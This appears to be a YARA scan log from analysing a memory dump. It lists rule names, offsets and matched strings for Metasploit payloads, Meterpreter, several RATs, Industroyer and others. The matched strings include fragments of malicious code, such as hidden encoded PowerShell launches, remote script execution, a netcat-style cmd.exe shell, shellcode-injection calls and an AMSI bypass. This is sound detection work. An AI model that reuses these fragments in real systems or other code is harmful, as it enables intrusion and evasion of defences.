0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Msfpayloads_msf_psh | Metasploit Payloads - file msf-psh.vba | Florian Roth | - 0x3efe:$s1: powershell.exe -nop -w hidden -e
- 0x3c5b8:$s1: powershell.exe -nop -w hidden -e
- 0x3cab1:$s1: powershell.exe -nop -w hidden -e
- 0x3c5dd:$s2: Call Shell(
- 0x3c5ed:$s3: Sub Workbook_Open() |
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Msfpayloads_msf_exe | Metasploit Payloads - file msf-exe.vba | Florian Roth | - 0x3cd5f:$s1: '* PAYLOAD DATA
- 0x3cd73:$s2: = Shell(
- 0x3cd81:$s3: = Environ("USERPROFILE")
- 0x3cd9e:$s4: '**************************************************************
- 0x3cde2:$s5: ChDir (
- 0x3cdee:$s6: '* MACRO CODE |
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Msfpayloads_msf_3 | Metasploit Payloads - file msf.psh | Florian Roth | - 0x3cf28:$s1: [DllImport("kernel32.dll")] public static extern int WaitForSingleObject(
- 0x3cf76:$s2: public enum MemoryProtection { ExecuteReadWrite = 0x40 }
- 0x3cfb3:$s3: .func]::VirtualAlloc(0,
- 0x3cfcf:$s4: .func+AllocationType]::Reserve -bOr [
- 0x3cff9:$s5: New-Object System.CodeDom.Compiler.CompilerParameters
- 0x3d033:$s6: ReferencedAssemblies.AddRange(@("System.dll", [PsObject].Assembly.Location))
- 0x3d084:$s7: public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }
- 0x3d0c9:$s8: .func]::CreateThread(0,0,$
- 0x3d0e8:$s9: public enum Time : uint { Infinite = 0xFFFFFFFF }
- 0x3d11f:$s10: = [System.Convert]::FromBase64String("/
- 0x3d14c:$s11: { $global:result = 3; return } |
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Msfpayloads_msf_4 | Metasploit Payloads - file msf.aspx | Florian Roth | - 0x3d298:$s1: = VirtualAlloc(IntPtr.Zero,(UIntPtr)
- 0x3d2c1:$s2: .Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
- 0x3d2f2:$s3: [System.Runtime.InteropServices.DllImport("kernel32")]
- 0x3d32d:$s4: private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;
- 0x3d36c:$s5: private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32 flAllocationType,IntPtr flProtect); |
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Msfpayloads_msf_exe_2 | Metasploit Payloads - file msf-exe.aspx | Florian Roth | - 0x3d515:$x1: = new System.Diagnostics.Process();
- 0x3d53d:$x2: .StartInfo.UseShellExecute = true;
- 0x3d564:$x3: , "svchost.exe");
- 0x3d57a:$s4: = Path.GetTempPath(); |
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Msfpayloads_msf_6 | Metasploit Payloads - file msf.vbs | Florian Roth | - 0x3f6f:$s1: = CreateObject("Wscript.Shell")
- 0x3d6bd:$s1: = CreateObject("Wscript.Shell")
- 0x3df15:$s1: = CreateObject("Wscript.Shell")
- 0x3abee:$s2: = CreateObject("Scripting.FileSystemObject")
- 0x3d6e1:$s2: = CreateObject("Scripting.FileSystemObject")
- 0x3dee4:$s2: = CreateObject("Scripting.FileSystemObject")
- 0x3d712:$s3: .GetSpecialFolder(2)
- 0x3d72b:$s4: .Write Chr(CLng("
- 0x3d741:$s5: = "4d5a90000300000004000000ffff00
- 0x3d767:$s6: For i = 1 to Len(
- 0x3d77d:$s7: ) Step 2 |
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Msfpayloads_msf_7 | Metasploit Payloads - file msf.vba | Florian Roth | - 0x3c8d7:$s1: Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal
- 0x3c91f:$s2: = VirtualAlloc(0, UBound(Tsw), &H1000, &H40)
- 0x3c950:$s3: = RtlMoveMemory( |
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Msfpayloads_msf_8 | Metasploit Payloads - file msf.ps1 | Florian Roth | - 0x3cf28:$s1: [DllImport("kernel32.dll")]
- 0x3d8b2:$s1: [DllImport("kernel32.dll")]
- 0x3d8d2:$s2: [DllImport("msvcrt.dll")]
- 0x3d8f0:$s3: -Name "Win32" -namespace Win32Functions -passthru
- 0x3d926:$s4: ::VirtualAlloc(0,[Math]::Max($
- 0x3d949:$s5: .Length,0x1000),0x3000,0x40)
- 0x3d96a:$s6: public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
- 0x3d9de:$s7: ::memset([IntPtr]($ |
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Msfpayloads_msf_cmd | Metasploit Payloads - file msf-cmd.ps1 | Florian Roth | - 0x3ca93:$x1: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e |
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Msfpayloads_msf_9 | Metasploit Payloads - file msf.war - contents | Florian Roth | - 0x3db34:$s1: if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1)
- 0x3db82:$s2: .concat(".exe");
- 0x3db97:$s3: [0] = "chmod";
- 0x3dbaa:$s4: = Runtime.getRuntime().exec(
- 0x3dbcb:$s5: , 16) & 0xff;
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Msfpayloads_msf_11 | Metasploit Payloads - file msf.hta | Florian Roth | - 0x3de98:$s1: .ExpandEnvironmentStrings("%PSModulePath%") + "..\powershell.exe") Then
- 0x3abee:$s2: = CreateObject("Scripting.FileSystemObject")
- 0x3d6e1:$s2: = CreateObject("Scripting.FileSystemObject")
- 0x3dee4:$s2: = CreateObject("Scripting.FileSystemObject")
- 0x3df15:$s3: = CreateObject("Wscript.Shell")
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Msfpayloads_msf_ref | Metasploit Payloads - file msf-ref.ps1 | Florian Roth | - 0x3e068:$s1: kernel32.dll WaitForSingleObject),
- 0x3e08f:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')
- 0x3e106:$s3: GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object
- 0x3e16c:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual',
- 0x8e6:$s5: = [System.Convert]::FromBase64String(
- 0x3d11f:$s5: = [System.Convert]::FromBase64String(
- 0x3e1af:$s5: = [System.Convert]::FromBase64String(
- 0x3e1d9:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]]
- 0x3e213:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard,
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | HKTL_Meterpreter_inMemory | Detects Meterpreter in-memory | netbiosX, Florian Roth | - 0xaafb:$s1: WS2_32.dll
- 0x93b8:$s2: ReflectiveLoader
- 0x9421:$s2: ReflectiveLoader
- 0x9839:$s2: ReflectiveLoader
- 0x98b5:$s2: ReflectiveLoader
- 0xd84b:$s2: ReflectiveLoader
- 0xd89b:$s2: ReflectiveLoader
- 0xe30b:$s2: ReflectiveLoader
- 0xe80c:$s2: ReflectiveLoader
- 0xeb1a:$s2: ReflectiveLoader
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | CVE_2017_8759_SOAP_Excel | Detects malicious files related to CVE-2017-8759 | Florian Roth | |
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | PowerShell_ISESteroids_Obfuscation | Detects PowerShell ISESteroids obfuscation | Florian Roth | - 0x15830:$x1: /\/===\__
- 0x1583e:$x2: ${__/\/==
- 0x1584c:$x3: Catch { }
- 0x1585a:$x4: \_/=} ${_
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Reflective_DLL_Loader_Aug17_1 | Detects Reflective DLL Loader | Florian Roth | - 0x936a:$x1: \Release\reflective_dll.pdb
- 0x938a:$x2: reflective_dll.x64.dll
- 0x93a5:$s3: DLL Injection
- 0x93b7:$s4: ?ReflectiveLoader@@YA_KPEAX@Z
- 0x9420:$s4: ?ReflectiveLoader@@YA_KPEAX@Z
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Reflective_DLL_Loader_Aug17_2 | Detects Reflective DLL Loader - suspicious - Possible FP could be program crack | Florian Roth | - 0x97eb:$x1: \ReflectiveDLLInjection-master\
- 0x980f:$s2: reflective_dll.dll
- 0x9a73:$s2: reflective_dll.dll
- 0x9ab4:$s2: reflective_dll.dll
- 0x9826:$s3: DLL injection
- 0x9838:$s4: _ReflectiveLoader@4
- 0x98b4:$s4: _ReflectiveLoader@4
- 0xeb19:$s4: _ReflectiveLoader@4
- 0x9850:$s5: Reflective Dll Injection
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Reflective_DLL_Loader_Aug17_3 | Detects Reflective DLL Loader | Florian Roth | - 0x9a20:$s1: \Release\inject.pdb
- 0x9a38:$s2: !!! Failed to gather information on system processes!
- 0x980f:$s3: reflective_dll.dll
- 0x9a73:$s3: reflective_dll.dll
- 0x9ab4:$s3: reflective_dll.dll
- 0x9a8a:$s4: [-] %s. Error=%d
- 0x9a9f:$s5: \Start Menu\Programs\reflective_dll.dll
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | VBScript_Favicon_File | VBScript cloaked as Favicon file used in Leviathan incident | Florian Roth | - 0x379:$x1: myxml = '<?xml version=""1.0"" encoding=""UTF-8""?>';myxml = myxml +'<root>
- 0x3c9:$x2: .Run "taskkill /im mshta.exe
- 0x3ea:$x3: <script language="VBScript">Window.ReSizeTo 0, 0 : Window.moveTo -2000,-2000 :
- 0x43d:$s1: .ExpandEnvironmentStrings("%ALLUSERSPROFILE%") &
- 0x472:$s2: .ExpandEnvironmentStrings("%temp%") &
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Backdoor_Redosdru_Jun17 | Detects malware Redosdru - file systemHome.exe | Florian Roth | - 0x18174:$x1: %s\%d.gho
- 0x11444:$x2: %s\nt%s.dll
- 0x18182:$x2: %s\nt%s.dll
- 0x18192:$x3: baijinUPdate
- 0x11454:$s1: RegQueryValueEx(Svchost\netsvcs)
- 0x181a3:$s1: RegQueryValueEx(Svchost\netsvcs)
- 0x181c8:$s2: serviceone
- 0x181d7:$s3: \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#f \x1F#
- 0x18242:$s4: servicetwo
- 0x18251:$s5: UpdateCrc
- 0x1825f:$s6: \x1F#[ \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#
- 0x182ba:$s7: nwsaPAgEnT
- 0x182c9:$s8: %-24s %-15s 0x%x(%d)
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Backdoor_Nitol_Jun17 | Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader | Florian Roth | - 0x110e2:$x1: User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)
- 0x18456:$x1: User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)
- 0x11132:$x2: User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)
- 0x184a6:$x2: User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)
- 0x184ef:$x3: TCPConnectFloodThread.target = %s
- 0x18515:$s1: \Program Files\Internet Explorer\iexplore.exe
- 0x18547:$s2: %c%c%c%c%c%c.exe
- 0x1855c:$s3: GET %s%s HTTP/1.1
- 0x18572:$s4: CCAttack.target = %s
- 0x112bd:$s5: Accept-Language: zh-cn
- 0x1858b:$s5: Accept-Language: zh-cn
- 0x185a6:$s6: jdfwkey
- 0x185b2:$s7: hackqz.f3322.org:8880
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | WScript_Shell_PowerShell_Combo | Detects malware from Middle Eastern campaign reported by Talos | Florian Roth | - 0x2b47:$s1: .CreateObject("WScript.Shell")
- 0x1a467:$s1: .CreateObject("WScript.Shell")
- 0x1a60b:$s1: .CreateObject("WScript.Shell")
- 0x3d30:$p1: powershell.exe
- 0x3d57:$p1: powershell.exe
- 0x3efe:$p1: powershell.exe
- 0x3f3b:$p1: powershell.exe
- 0x56df:$p1: powershell.exe
- 0xd0b0:$p1: powershell.exe
- 0xd20b:$p1: powershell.exe
- 0xd249:$p1: powershell.exe
- 0x1030e:$p1: powershell.exe
- 0x133ee:$p1: powershell.exe
- 0x38d6a:$p1: powershell.exe
- 0x3b774:$p1: powershell.exe
- 0x3bbd0:$p1: powershell.exe
- 0x3c5b8:$p1: powershell.exe
- 0x3cab1:$p1: powershell.exe
- 0x3deca:$p1: powershell.exe
- 0x8e8:$p3: [System.Convert]::FromBase64String(
- 0x3d121:$p3: [System.Convert]::FromBase64String(
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | HTA_with_WScript_Shell | Detects WScript Shell in HTA | Florian Roth | - 0x15f02:$s1: <hta:application windowstate="minimize"/>
- 0x16093:$s1: <hta:application windowstate="minimize"/>
- 0x15f30:$s2: <script>var b=new ActiveXObject("WScript.Shell");
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | HTA_Embedded | Detects an embedded HTA file | Florian Roth | - 0x15f02:$s1: <hta:application windowstate="minimize"/>
- 0x16093:$s1: <hta:application windowstate="minimize"/>
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | StoneDrill | Detects malware from StoneDrill threat report | Florian Roth | - 0x3a91f:$s1: Hello dear
- 0x3a92e:$s2: WRZRZRAR
- 0x3a93d:$opa1: 66 89 45 D8 6A 64 FF
- 0x3a94b:$opa2: 8D 73 01 90 0F BF 51 FE
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | StoneDrill_VBS_1 | Detects malware from StoneDrill threat report | Florian Roth | - 0x3aad0:$x1: wmic /NameSpace:\\root\default Class StdRegProv Call SetStringValue hDefKey = "&H80000001" sSubKeyName = "Software\Micros
- 0x3ab4e:$x2: ping 1.0.0.0 -n 1 -w 20000 > nul
- 0x3ab73:$s1: WshShell.CopyFile "%COMMON_APPDATA%\Chrome\
- 0x3aba3:$s2: WshShell.DeleteFile "%temp%\
- 0x3abc4:$s3: WScript.Sleep(10 * 1000)
- 0x3abe1:$s4: Set WshShell = CreateObject("Scripting.FileSystemObject") While WshShell.FileExists("
- 0x3ac3b:$s5: , "%COMMON_APPDATA%\Chrome\
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | ZxShell_Jul17 | Detects a ZxShell - CN threat group | Florian Roth | - 0x115a6:$x1: zxplug -add
- 0x115b6:$x2: getxxx c:\xyz.dll
- 0x115cc:$x3: downfile -d c:\windows\update.exe
- 0x115f2:$x4: -fromurl http://x.x.x/x.dll
- 0x11612:$x5: ping 127.0.0.1 -n 7&cmd.exe /c net start %s
- 0x11642:$x6: ZXNC -e cmd.exe x.x.x.x
- 0x1165e:$x7: (bind a cmdshell)
- 0x11674:$x8: ZXFtpServer 21 20 zx
- 0x1168d:$x9: ZXHttpServer
- 0x1169f:$x10: c:\error.htm,.exe|c:\a.exe,.zip|c:\b.zip"
- 0x116ce:$x11: c:\windows\clipboardlog.txt
- 0x116ef:$x12: AntiSniff -a wireshark.exe
- 0x1170f:$x13: c:\windows\keylog.txt
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EternalRocks_taskhost | Detects EternalRocks Malware - file taskhost.exe | Florian Roth | - 0x19abd:$s1: sTargetIP
- 0x19acb:$s2: SERVER_2008R2_SP0
- 0x19ae1:$s3: 20D5CCEE9C91A1E61F72F46FA117B93FB006DB51
- 0x19b0e:$s4: 9EBF75119B8FC7733F77B06378F9E735D34664F6
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | BeyondExec_RemoteAccess_Tool | Detects BeyondExec Remote Access Tool - file rexesvr.exe | Florian Roth | - 0x38f02:$x1: \BeyondExecV2\Server\Release\Pipes.pdb
- 0x38f2d:$x2: \\.\pipe\beyondexec%d-stdin
- 0x38f4d:$x3: Failed to create dispatch pipe. Do you have another instance running?
- 0x38f98:$op1: 83 E9 04 72 0C 83 E0 03 03 C8 FF 24 85 80 6F 40
- 0x38fae:$op2: 6A 40 33 C0 59 BF E0 D8 40 00 F3 AB 8D 0C 52 C1
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Disclosed_0day_POCs_injector | Detects POC code from disclosed 0day hacktool set | Florian Roth | - 0x128be:$x1: \Release\injector.pdb
- 0x128d8:$x2: Cannot write the shellcode in the process memory, error:
- 0x12916:$x3: /s shellcode_file PID: shellcode injection.
- 0x12946:$x4: /d dll_file PID: dll injection via LoadLibrary().
- 0x12916:$x5: /s shellcode_file PID
- 0x1297c:$x5: /s shellcode_file PID
- 0x12996:$x6: Shellcode copied in memory: OK
- 0x129b9:$x7: Usage of the injector.
- 0x129d5:$x8: KO: cannot obtain the SeDebug privilege.
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | APT_PupyRAT_PY | Detects Pupy RAT | Florian Roth | - 0xa0de:$x1: reflective_inject_dll
- 0xa15f:$x1: reflective_inject_dll
- 0xa179:$x1: reflective_inject_dll
- 0x3b8f8:$x1: reflective_inject_dll
- 0x3b912:$x2: ImportError: pupy builtin module not found !
- 0x3b943:$x3: please start pupy from either it's exe stub or it's reflective DLLR;
- 0xa132:$x4: [INJECT] inject_dll.
- 0x3b98c:$x4: [INJECT] inject_dll.
- 0x3b9a5:$x5: import base64,zlib;exec zlib.decompress(base64.b64decode('eJzzcQz1c/ZwDbJVT87Py0tNLlHnAgA56wXS'))
- 0x3ba0c:$op1: 8B 42 0C 8B 78 14 89 5C 24 18 89 7C 24 14 3B FD
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | OilRig_Strings_Oct17 | Detects strings from OilRig malware and malicious scripts | Florian Roth | - 0x651:$x1: %localappdata%\srvHealth.exe
- 0x672:$x2: %localappdata%\srvBS.txt
- 0x68f:$x3: Agent Injector\PolicyConverter\Inner\obj\Release\Inner.pdb
- 0x6ce:$x4: Agent Injector\PolicyConverter\Joiner\obj\Release\Joiner.pdb
- 0x70f:$s3: .LoadDll("Run", arg, "C:\\Windows\\
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Suspicious_Script_Running_from_HTTP | Detects a suspicious | Florian Roth | - 0x91a9:$s1: cmd /C script:http://
- 0x91c3:$s2: cmd /C script:https://
- 0x91de:$s3: cmd.exe /C script:http://
- 0x91fc:$s4: cmd.exe /C script:https://
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | VBS_dropper_script_Dec17_1 | Detects a suspicious VBS script that drops an executable | Florian Roth | - 0x89e:$s5: TVqQAAMAAAAEAA
- 0xf6e3:$s5: TVqQAAMAAAAEAA
- 0x3f6f:$a1: = CreateObject("Wscript.Shell")
- 0x3d6bd:$a1: = CreateObject("Wscript.Shell")
- 0x3df15:$a1: = CreateObject("Wscript.Shell")
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Industroyer_Malware_1 | Detects Industroyer related malware | Florian Roth | - 0x1706d:$s1: haslo.exe
- 0x170ce:$x1: 00 53 00 65 00 72 00 76 00 69 00 63 00 65 00 73 00 5C 00 25 00 6C 00 73 00 00 00 49 00 6D 00 61 ...
- 0x1711a:$x2: haslo.datCrash
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Industroyer_Portscan_3_Output | Detects Industroyer related custom port scanner output file | Florian Roth | - 0x16ef3:$s1: WSA library load complite.
- 0x16f12:$s2: Connection refused
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Industroyer_Malware_4 | Detects Industroyer related malware | Florian Roth | - 0x177aa:$s2: defragsvc
- 0x177b8:$a1: 00 2E 00 64 00 61 00 74 00 00 00 43 72 61 73 68 00 00 00
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Industroyer_Malware_5 | Detects Industroyer related malware | Florian Roth | - 0x17907:$x1: D2MultiCommService.exe
- 0x17922:$x2: Crash104.dll
- 0x17933:$x3: iec104.log
- 0x17942:$x4: IEC-104 client: ip=%s; port=%s; ASDU=%u
- 0x1796f:$s1: Error while getaddrinfo executing: %d
- 0x17999:$s2: return info-Remote command
- 0x179b8:$s3: Error killing process ...
- 0x179d6:$s4: stop_comm_service_name
- 0x179f1:$s5: *1* Data exchange: Send: %d (%s)
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | redSails_PY | Detects Red Sails Hacktool - Python | Florian Roth | - 0x3b05:$x1: Gained command shell on host
- 0x3b26:$x2: [!] Received an ERROR in shell()
- 0x3b4b:$x3: Target IP address with backdoor installed
- 0x3b79:$x4: Open backdoor port on target machine
- 0x3ba2:$x5: Backdoor port to open on victim machine
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Rehashed_RAT_2 | Detects malware from Rehashed RAT incident | Florian Roth | - 0x7417:$x1: dalat.dulichovietnam.net
- 0x7434:$x2: web.Thoitietvietnam.org
- 0x7450:$a1: User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64)
- 0x749a:$a2: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3
- 0x751f:$s1: GET /%s%s%s%s HTTP/1.1
- 0x753a:$s2: http://%s:%d/%s%s%s%s
- 0x7554:$s3: {521338B8-3378-58F7-AFB9-E7D35E683BF8}
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Pupy_Backdoor | Detects Pupy backdoor | Florian Roth | - 0xa025:$x1: reflectively inject a dll into a process.
- 0xa053:$x2: ld_preload_inject_dll(cmdline, dll_buffer, hook_exit) -> pid
- 0xa094:$x3: LD_PRELOAD=%s HOOK_EXIT=%d CLEANUP=%d exec %s 1>/dev/null 2>/dev/null
- 0xa0de:$x4: reflective_inject_dll
- 0xa15f:$x4: reflective_inject_dll
- 0xa179:$x4: reflective_inject_dll
- 0x3b8f8:$x4: reflective_inject_dll
- 0xa053:$x5: ld_preload_inject_dll
- 0xa0f8:$x5: ld_preload_inject_dll
- 0xa112:$x6: get_pupy_config() -> string
- 0xa132:$x7: [INJECT] inject_dll. OpenProcess failed.
- 0xa0de:$x8: reflective_inject_dll
- 0xa15f:$x8: reflective_inject_dll
- 0xa179:$x8: reflective_inject_dll
- 0x3b8f8:$x8: reflective_inject_dll
- 0xa179:$x9: reflective_inject_dll(pid, dll_buffer, isRemoteProcess64bits)
- 0xa1bc:$x10: linux_inject_main
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Microcin_Sample_5 | Malware sample mentioned in Microcin technical report by Kaspersky | Florian Roth | - 0x4fc6:$x1: Sorry, you are not fortuante ^_^, Please try other password dictionary
- 0x5012:$x2: DomCrack <IP> <UserName> <Password_Dic file path> <option>
- 0x5051:$x3: The password is "%s" Time: %d(s)
- 0x507e:$x4: The password is " %s " Time: %d(s)
- 0x50ad:$x5: No password found!
- 0x50c4:$x7: Can not found the Password Dictoonary file!
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | clearlog | Detects Fireball malware - file clearlog.dll | Florian Roth | - 0x193c5:$x1: \ClearLog\Release\logC.pdb
- 0x1940a:$s2: logC.dll
- 0x19433:$s5: Logger Name:
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | PS_AMSI_Bypass | Detects PowerShell AMSI Bypass | Florian Roth | - 0xf1b4:$s1: .GetField('amsiContext',[Reflection.BindingFlags]'NonPublic,Static').
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | JS_Suspicious_Obfuscation_Dropbox | Detects PowerShell AMSI Bypass | Florian Roth | - 0xf37f:$x1: j"+"a"+"v"+"a"+"s"+"c"+"r"+"i"+"p"+"t"
- 0xf3aa:$x2: script:https://www.dropbox.com
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | JS_Suspicious_MSHTA_Bypass | Detects MSHTA Bypass | Florian Roth | - 0x7d9e:$s1: mshtml,RunHTMLApplication
- 0xf523:$s1: mshtml,RunHTMLApplication
- 0xf541:$s2: new ActiveXObject("WScript.Shell").Run(
- 0xf56d:$s3: /c start mshta j
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | JavaScript_Run_Suspicious | Detects a suspicious Javascript Run command | Florian Roth | - 0x8dc6:$s1: w = new ActiveXObject(
- 0x8de1:$s2: w.Run(r);
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | FVEY_ShadowBroker_Auct_Dez16_Strings | String from the ShadowBroker Files Screenshots - Dec 2016 | Florian Roth | - 0x2cefa:$s2: Auditcleaner
- 0x2cf61:$s2: Auditcleaner
- 0x32706:$s11: elatedmonkey
- 0x3277a:$s11: elatedmonkey
- 0x2d510:$s17: ys.ratload.sh
- 0x2bc65:$elf4: charm_saver
- 0x2f4b5:$elf8: ebbshave
- 0x2f51d:$elf8: ebbshave
- 0x2f753:$elf9: eggbasket
- 0x2f7bc:$elf9: eggbasket
- 0x319d4:$elf12: envoytomato
- 0x31a3a:$elf12: envoytomato
- 0x317bf:$elf14: estopmoonlit
- 0x31826:$elf14: estopmoonlit
- 0x33021:$elf17: ghost_sparc
- 0x3309e:$elf17: ghost_sparc
- 0x30db6:$elf18: jackpop
- 0x30e1d:$elf18: jackpop
- 0x2a85c:$elf19: orleans_stride
- 0x2ade8:$elf21: seconddate
- 0x2bc65:$pe2: charm_saver
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Ysoserial_Payload_Spring1 | Ysoserial Payloads - file Spring1.bin | Florian Roth | - 0x3e9db:$x1: ysoserial/Pwner
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Ysoserial_Payload | Ysoserial Payloads | Florian Roth | - 0x3eb30:$x1: ysoserial/payloads/
- 0x3eb48:$s1: StubTransletPayload
- 0x3eb60:$s2: Pwnrpw
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Ysoserial_Payload_3 | Ysoserial Payloads - from files JavassistWeld1.bin, JBossInterceptors.bin | Florian Roth | - 0x3ece5:$x1: ysoserialq
- 0x3ecf4:$s1: targetClassInterceptorMetadatat
- 0x3ed18:$s2: targetInstancet
- 0x3ed2c:$s3: targetClassL
- 0x3ed3d:$s4: POST_ACTIVATEsr
- 0x3ed51:$s5: PRE_DESTROYsq
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | CACTUSTORCH | Detects CactusTorch Hacktool | Florian Roth | - 0xc7e4:$x1: $payload = shellcode(%options["listener"], "true", "x86");
- 0xc823:$x2: Copy the base64 encoded payload into the code variable below.
- 0xc886:$x4: ms.Write transform.TransformFinalBlock(enc.GetBytes_4(b), 0, length), 0, ((length / 4) * 3)
- 0xc8e6:$x5: ' Author: Vincent Yiu (@vysecurity)
- 0xc90e:$x6: Dim binary : binary = "rundll32.exe"
- 0xc937:$a1: code = code & "
- 0xc94b:$a2: serialized_obj = serialized_obj & "
- 0xc91b:$s1: binary = "rundll32.exe"
- 0xc973:$s1: binary = "rundll32.exe"
- 0xc9e4:$s1: binary = "rundll32.exe"
- 0xc98f:$s2: EL.DataType = "bin.hex"
- 0xc9ab:$s3: Set stm = CreateObject("System.IO.MemoryStream")
- 0xc9e0:$s4: var binary = "rundll32.exe";
- 0xca01:$s5: var serialized_obj = "
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Quasar_RAT_1 | Detects Quasar RAT | Florian Roth | - 0x3405e:$s1: DoUploadAndExecute
- 0x34075:$s2: DoDownloadAndExecute
- 0x3408e:$s3: DoShellExecute
- 0x340a1:$s4: set_Processname
- 0x340b6:$op1: 04 1E FE 02 04 16 FE 01 60
- 0x340c5:$op2: 00 17 03 1F 20 17 19 15 28
- 0x340d4:$op3: 00 04 03 69 91 1B 40
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Quasar_RAT_2 | Detects Quasar RAT | Florian Roth | - 0x34226:$x1: GetKeyloggerLogsResponse
- 0x34243:$x2: get_Keylogger
- 0x34255:$x3: HandleGetKeyloggerLogsResponse
- 0x34278:$s1: DoShellExecuteResponse
- 0x34293:$s2: GetPasswordsResponse
- 0x342ac:$s3: GetStartupItemsResponse
- 0x342c8:$s4: <GetGenReader>b__7
- 0x342df:$s5: RunHidden
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | OpCloudHopper_Malware_2 | Detects malware from Operation Cloud Hopper | Florian Roth | - 0x370d2:$x1: sERvEr.Dll
- 0x370f2:$x3: .?AVCKeyLoggerManager@@
- 0x3710e:$x4: GH0STCZH
- 0x37177:$s3: \Release\Loader.pdb
- 0x371fe:$op1: 8D 34 17 8D 49 00 8A 14 0E 3A 14 29 75 05 41 3B
